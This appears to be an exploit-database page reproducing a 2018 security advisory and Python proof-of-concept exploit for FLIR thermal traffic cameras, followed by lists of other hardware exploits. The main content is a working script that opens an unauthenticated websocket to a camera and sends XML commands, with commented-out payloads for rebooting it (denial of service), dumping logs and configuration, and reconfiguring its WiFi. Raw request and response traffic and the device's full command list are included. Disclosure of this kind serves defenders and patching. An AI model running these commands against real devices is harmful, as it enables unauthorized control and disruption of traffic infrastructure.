Menu

"FLIR Thermal Traffic Cameras 1.01-0bb5b27 - Information Disclosure"

Author

LiquidWorm

Platform

hardware

Release date

2018-10-08

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
# Title: FLIR Thermal Traffic Cameras 1.01-0bb5b27 - Information Disclosure
# Author: Gjoko 'LiquidWorm' Krstic
# Date: 2018-10-06
# Vendor: FLIR Systems, Inc.
# Link: https://www.flir.com
# Tested on: nginx/1.12.1, nginx/1.10.2, nginx/1.8.0, Websocket/13 (RFC 6455)
# Affected firmware version: V1.01-0bb5b27 (TrafiOne)     Codename: TrafiOne
#                            E1.00.09      (TI BPL2 EDGE) Codename: TIIP4EDGE
#                            V1.02.P01     (TI x-stream)  Codename: TIIP2
#                            V1.05.P01     (ThermiCam)    Codename: ThermiCam
#                            V1.04.P02     (ThermiCam)    Codename: ThermiCam
#                            V1.04         (ThermiCam)    Codename: ThermiCam
#                            V1.01.P02     (ThermiCam)    Codename: ThermiCam
#                            V1.05.P03     (TrafiSense)   Codename: TrafiSense
#                            V1.06         (VIP-IP)       Codename: VIP-IP
#                            V1.02.P02     (TrafiRadar)   Codename: TrafiRadar
#
# Vendor patched firmware version:
#
# Product name                Firmware      Released 
# ----------------------------------------------------
# ThermiCam / TrafiSense      E1.06.03      17.09.2018
# TI BPL2 EDGE                V1.00         17.09.2018
# TI x-stream                 E1.03.02      17.09.2018
# TrafiOne                    E1.02.02      17.09.2018
# ----------------------------------------------------
#
# Advisory ID: ZSL-2018-5490
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5490.php
# Vendor firmware updates: https://www.flir.com/security/best-practices-for-cybersecurity/
# Vendor cyber hardening guide: https://www.flir.com/globalassets/security/flir-pro-security-cyber-hardening-guide.pdf

# Desc: FLIR thermal traffic cameras suffer from an unauthenticated device manipulation
# vulnerability utilizing the websocket protocol. The affected FLIR Intelligent
# Transportation Systems - ITS models use an insecure implementation of websocket
# communication used for administering the device. Authentication and authorization
# bypass via referencing a direct object allows an attacker to directly modify running
# configurations, disclose information or initiate a denial of service (DoS) scenario
# with Reboot command. The devices do not support the usage of TLS 'wss://' prefix for
# WebSocket Secure connection making the network traffic disclosed in plain-text to
# MitM evil-doers. Also, the web service has an Origin validation security issue and
# is vulnerable to Cross-Site WebSocket Hijacking (CSWSH).
#
# ---
# Request:
#
# GET ws://192.168.1.1:13042/ws/xml2 HTTP/1.1
# Host: 192.168.1.1:13042
# Connection: Upgrade
# Pragma: no-cache
# Cache-Control: no-cache
# User-Agent: Bond/00.7
# Upgrade: websocket
# Origin: zeroscience.mk:1337
# Sec-WebSocket-Version: 13
# Accept-Encoding: gzip, deflate
# Accept-Language: en-US,en;q=0.9
# Cookie: tmhDynamicLocale.locale=%22en%22
# Sec-WebSocket-Key: A5SH9PRtc3rYF49kKO4vmw==
# Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
#
# Response:
#
# HTTP/1.1 101 Switching Protocols
# Server: nginx/1.10.2
# Date: Mon, 13 Aug 2018 02:48:46 GMT
# Content-Length: 0
# Connection: upgrade
# Upgrade: WebSocket
# Sec-WebSocket-Accept: QyXaTdjpCsAyxhVnVqjMg95jepk=
#
# ---
# No HTTP/1.1 401 Unauthorized response observed.
#

#!/usr/bin/env python
# -*- coding: utf-8 -*-

from websocket import create_connection as t00t
import time
import sys

endpoint = "/ws/xml2"

if (len(sys.argv) <= 2):
    print '[*] Usage: exploit.py <ipaddress> <port>'
    exit(0)

host = sys.argv[1]
port = sys.argv[2]

# Supported message types:
'''
<Message Type="SupportedMessages">
<Body>
	<Message Type="GetMessageConstraints"/>
	<Message Type="GetSupportedMessages"/>
	<Message Type="Session"/>
	<Message Type="Subscription"/>
	<Message Type="ClearData"/>
	<Message Type="GetConnectionInformation"/>
	<Message Type="GetData"/>
	<Message Type="GetEvents"/>
	<Message Type="GetLostData"/>
	<Message Type="GetManagedBy"/>
	<Message Type="GetPresenceData"/>
	<Message Type="GetPresenceLevel"/>
	<Message Type="GetPresenceLevelHistory"/>
	<Message Type="GetStorageLimits"/>
	<Message Type="SetConnectionSettings"/>
	<Message Type="SetManagedBy"/>
	<Message Type="ClearBootCount"/>
	<Message Type="ClearHistogram"/>
	<Message Type="ClearStoredCounter"/>
	<Message Type="ClearSystemLogs"/>
	<Message Type="CreateAviSequence"/>
	<Message Type="DoBadStuff"/> <-- ;]]
	<Message Type="ForceEvent"/>
	<Message Type="ForceKeyframe"/>
	<Message Type="GetBootCount"/>
	<Message Type="GetBplSettings"/>
	<Message Type="GetCameraConfiguration"/>
	<Message Type="GetCameraDefinitions"/>
	<Message Type="GetCameraSettings"/>
	<Message Type="GetConfiguration"/>
	<Message Type="GetConstraints"/>
	<Message Type="GetCpuStatistics"/>
	<Message Type="GetDateTime"/>
	<Message Type="GetDisplayOverlay"/>
	<Message Type="GetEventLog"/>
	<Message Type="GetEventsDescription"/>
	<Message Type="GetFrameFlow"/>
	<Message Type="GetHardwareInformation"/>
	<Message Type="GetHardwareSensors"/>
	<Message Type="GetHistogram"/>
	<Message Type="GetImage"/>
	<Message Type="GetImageSharpness"/>
	<Message Type="GetLeptonSettings"/>
	<Message Type="GetLoggingActivation"/>
	<Message Type="GetMemoryStatistics"/>
	<Message Type="GetNumberOfOutputs"/>
	<Message Type="GetOpenEvents"/>
	<Message Type="GetOutputsState"/>
	<Message Type="GetPermissions"/>
	<Message Type="GetProductInformation"/>
	<Message Type="GetSocketInformation"/>
	<Message Type="GetState"/>
	<Message Type="GetStoredCounter"/>
	<Message Type="GetSystemLogs"/>
	<Message Type="GetTemperature"/>
	<Message Type="GetThermalQualityHistogram"/>
	<Message Type="GetThermalQualityReferenceImage"/>
	<Message Type="GetThreadInformation"/>
	<Message Type="GetTime"/>
	<Message Type="GetTranslations"/>
	<Message Type="GetUpTime"/>
	<Message Type="GetVersion"/>
	<Message Type="GetVoltage"/>
	<Message Type="GetWifiInformation"/>
	<Message Type="KeepAlive"/>
	<Message Type="Notify"/>
	<Message Type="PauseDetectionFramework"/>
	<Message Type="Reboot"/>
	<Message Type="SetBplSettings"/>
	<Message Type="SetCameraConfiguration"/>
	<Message Type="SetCameraSettings"/>
	<Message Type="SetConfiguration"/>
	<Message Type="SetConstraintsFilter"/>
	<Message Type="SetDateTime"/>
	<Message Type="SetDisplayOverlay"/>
	<Message Type="SetHardwareInformation"/>
	<Message Type="SetLeptonSettings"/>
	<Message Type="SetLoggingActivation"/>
	<Message Type="SetTime"/>
	<Message Type="SetWifiInformation"/>
	<Message Type="UpdateFrameFlow"/>
</Body>
</Message>
'''

socket = t00t("ws://"+host+":"+port+endpoint)

#print 'Sending Reboot message type (DoS)...'
#msg = '<Message Type=\"Reboot\"></Message>'
#print 'Getting supported messages...'
#msg = '<Message Type=\"GetSupportedMessages\"></Message>'
#print 'Getting system logs...'
#msg = '<Message Type=\"GetSystemLogs\"></Message>'
#print 'Getting device configuration...'
#msg = '<Message Type=\"GetConfiguration\"></Message>'
#print 'Setting new Wifi information...'
#msg ='''
#<Message Type="SetWifiInformation">
#    <Body Present="0" SSID="pwned" Channel="11" Hidden="0" Mode="AccessPoint" />
#</Message>
#'''

msg = '<Message Type=\"GetProductInformation\"></Message>'

socket.send(msg)
print 'Message sent.'
print 'Receiving...'
time.sleep(2)
priem =  socket.recv()
print 'Received data: \n%s' % priem
socket.close()
Release Date Title Type Platform Author
2019-08-14 "D-Link DIR-600M - Authentication Bypass (Metasploit)" webapps hardware "Devendra Singh Solanki"
2019-08-12 "Cisco Adaptive Security Appliance - Path Traversal (Metasploit)" webapps hardware "Angelo Ruwantha"
2019-08-01 "Cisco Catalyst 3850 Series Device Manager - Cross-Site Request Forgery" webapps hardware "Alperen Soydan"
2019-07-30 "Amcrest Cameras 2.520.AC00.18.R - Unauthenticated Audio Streaming" webapps hardware "Jacob Baines"
2019-07-24 "Cisco Wireless Controller 3.6.10E - Cross-Site Request Forgery" webapps hardware "Mehmet Onder"
2019-07-15 "CISCO Small Business 200 / 300 / 500 Switches - Multiple Vulnerabilities" webapps hardware Ramikan
2019-07-15 "NETGEAR WiFi Router JWNR2010v5 / R6080 - Authentication Bypass" webapps hardware Wadeek
2019-07-12 "Tenda D301 v2 Modem Router - Persistent Cross-Site Scripting" webapps hardware ABDO10
2019-07-01 "FaceSentry Access Control System 6.4.8 - Remote Root Exploit" webapps hardware LiquidWorm
2019-07-01 "FaceSentry Access Control System 6.4.8 - Cross-Site Request Forgery" webapps hardware LiquidWorm
2019-07-01 "FaceSentry Access Control System 6.4.8 - Remote Command Injection" webapps hardware LiquidWorm
2019-07-01 "FaceSentry Access Control System 6.4.8 - Remote SSH Root" remote hardware LiquidWorm
2019-06-25 "Fortinet FCM-MB40 - Cross-Site Request Forgery / Remote Command Execution" webapps hardware XORcat
2019-06-25 "SAPIDO RB-1732 - Remote Command Execution" remote hardware k1nm3n.aotoi
2019-06-17 "CleverDog Smart Camera DOG-2W / DOG-2W-V4 - Multiple Vulnerabilities" webapps hardware "Alex Akinbi"
2019-06-06 "Supra Smart Cloud TV - 'openLiveURL()' Remote File Inclusion" webapps hardware "Dhiraj Mishra"
2019-06-03 "AUO Solar Data Recorder < 1.3.0 - Incorrect Access Control" webapps hardware Luca.Chiou
2019-06-04 "Cisco RV130W 1.0.3.44 - Remote Stack Overflow" remote hardware @0x00string
2019-06-04 "NUUO NVRMini 2 3.9.1 - 'sscanf' Stack Overflow" remote hardware @0x00string
2019-05-22 "Carel pCOWeb < B1.2.1 - Credentials Disclosure" webapps hardware Luca.Chiou
2019-05-22 "Carel pCOWeb < B1.2.1 - Cross-Site Scripting" webapps hardware Luca.Chiou
2019-05-22 "AUO Solar Data Recorder < 1.3.0 - 'addr' Cross-Site Scripting" webapps hardware Luca.Chiou
2019-05-21 "TP-LINK TL-WR840N v5 00000005 - Cross-Site Scripting" webapps hardware "purnendu ghosh"
2019-05-14 "D-Link DWL-2600AP - Multiple OS Command Injection" webapps hardware "Raki Ben Hamouda"
2019-05-10 "RICOH SP 4520DN Printer - HTML Injection" webapps hardware "Ismail Tasdelen"
2019-05-10 "RICOH SP 4510DN Printer - HTML Injection" webapps hardware "Ismail Tasdelen"
2019-05-06 "LG Supersign EZ CMS - Remote Code Execution (Metasploit)" remote hardware "Alejandro Fanjul"
2019-05-03 "Crestron AM/Barco wePresent WiPG/Extron ShareLink/Teq AV IT/SHARP PN-L703WA/Optoma WPS-Pro/Blackbox HD WPS/InFocus LiteShow - Remote Command Injection" webapps hardware "Jacob Baines"
2019-04-30 "Intelbras IWR 3000N 1.5.0 - Cross-Site Request Forgery" webapps hardware "Social Engineering Neo"
2019-04-30 "Intelbras IWR 3000N - Denial of Service (Remote Reboot)" webapps hardware "Social Engineering Neo"
Release Date Title Type Platform Author
2019-07-18 "WordPress Plugin OneSignal 1.17.5 - 'subdomain' Persistent Cross-Site Scripting" webapps linux LiquidWorm
2019-07-01 "FaceSentry Access Control System 6.4.8 - Remote Root Exploit" webapps hardware LiquidWorm
2019-07-01 "FaceSentry Access Control System 6.4.8 - Cross-Site Request Forgery" webapps hardware LiquidWorm
2019-07-01 "FaceSentry Access Control System 6.4.8 - Remote Command Injection" webapps hardware LiquidWorm
2019-07-01 "FaceSentry Access Control System 6.4.8 - Remote SSH Root" remote hardware LiquidWorm
2019-05-20 "Huawei eSpace 1.1.11.103 - DLL Hijacking" local windows LiquidWorm
2019-05-20 "Huawei eSpace 1.1.11.103 - 'ContactsCtrl.dll' / 'eSpaceStatusCtrl.dll' ActiveX Heap Overflow" dos windows LiquidWorm
2019-05-20 "Huawei eSpace 1.1.11.103 - Image File Format Handling Buffer Overflow" dos windows LiquidWorm
2019-05-20 "Huawei eSpace Meeting 1.1.11.103 - 'cenwpoll.dll' SEH Buffer Overflow (Unicode)" dos windows LiquidWorm
2019-05-15 "Legrand BTicino Driver Manager F454 1.0.51 - Cross-Site Request Forgery / Cross-Site Scripting" webapps php LiquidWorm
2019-05-16 "SEL AcSELerator Architect 2.2.24 - CPU Exhaustion Denial of Service" dos windows LiquidWorm
2019-05-13 "SOCA Access Control System 180612 - Cross-Site Request Forgery (Add Admin)" webapps php LiquidWorm
2019-05-13 "SOCA Access Control System 180612 - SQL Injection" webapps php LiquidWorm
2019-05-13 "SOCA Access Control System 180612 - Information Disclosure" webapps php LiquidWorm
2019-04-23 "Ross Video DashBoard 8.5.1 - Insecure Permissions" local windows LiquidWorm
2019-03-14 "Intel Modular Server System 10.18 - Cross-Site Request Forgery (Change Admin Password)" webapps php LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Arbitrary File Disclosure" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Remote Code Execution" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2019-01-28 "BEWARD Intercom 2.3.1 - Credentials Disclosure" local windows LiquidWorm
2019-01-07 "Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - JS/HTML Code Injection" webapps windows LiquidWorm
2019-01-07 "Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - Cross-Site Request Forgery" webapps windows LiquidWorm
2018-11-30 "Synaccess netBooter NP-02x/NP-08x 6.8 - Authentication Bypass" webapps cgi LiquidWorm
2018-11-21 "Synaccess netBooter NP-0801DU 7.4 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2018-11-05 "Microsoft Internet Explorer 11 - Null Pointer Dereference" local windows LiquidWorm
2018-10-17 "TP-Link TL-SC3130 1.6.18 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2018-10-15 "FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution" webapps hardware LiquidWorm
2018-10-15 "FLIR Brickstream 3D+ 2.1.742.1842 - Config File Disclosure" webapps hardware LiquidWorm
2018-10-15 "FLIR AX8 Thermal Camera 1.32.16 - Arbitrary File Disclosure" webapps hardware LiquidWorm
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/45539/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/45539/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/45539/40159/flir-thermal-traffic-cameras-101-0bb5b27-information-disclosure/download/", "exploit_id": "45539", "exploit_description": "\"FLIR Thermal Traffic Cameras 1.01-0bb5b27 - Information Disclosure\"", "exploit_date": "2018-10-08", "exploit_author": "LiquidWorm", "exploit_type": "webapps", "exploit_platform": "hardware", "exploit_port": null}
                                            

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Browse exploit APIBrowse